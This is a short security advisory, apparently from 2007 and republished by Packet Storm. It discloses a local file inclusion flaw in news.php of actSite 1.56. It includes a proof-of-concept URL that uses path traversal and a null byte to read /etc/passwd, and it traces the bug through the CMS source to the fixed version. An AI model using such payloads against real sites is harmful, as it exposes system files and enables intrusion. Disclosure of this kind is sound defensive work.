actSite version 1.56 suffers from a local file inclusion vulnerability in news.php.
c51fcebfec9b333edfc4c2d1aa8ded952c826193226cd3f476e683aedd161fca \#'#/
(-.-)
-----------------oOO---(_)---OOo-----------------
| actSite v1.56 (news.php) Local File Inclusion |
| coded by DNX |
-------------------------------------------------
[!] Discovered: DNX
[!] Vendor: http://www.actsite.de
[!] Detected: 02.09.2007
[!] Reported: 02.09.2007
[!] Remote: yes
[!] Background: actSite is a content management system based on PHP and MySQL
[!] Bug: in phpinc/news.php line 101
require PHP_INCLUDE_PATH."/inc/news/news_$_POST[do].php";
[!] PoC:
- http://[site]/[path]/phpinc/news.php?do=/../../../../../../../etc/passwd%00
[!] Description:
- So why we can inject code in a post variable per url? Let's do some research...
- In phpinc/news.php line 36
require_once('../config.php');
- Let's take a look in 'config.php' line 22
if(empty($BaseCfg['install_run'])) require_once($BaseCfg['BaseDir']."/phpinc/inc/csb.php");
- Ok, let's take a look in 'phpinc/inc/csb.php' line 18
if(getenv('REQUEST_METHOD') == "GET") {
foreach($_GET as $key => $val) {
$_POST[$key] =& $_GET[$key];
}
}
[!] Solution: Install security update to v1.57
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed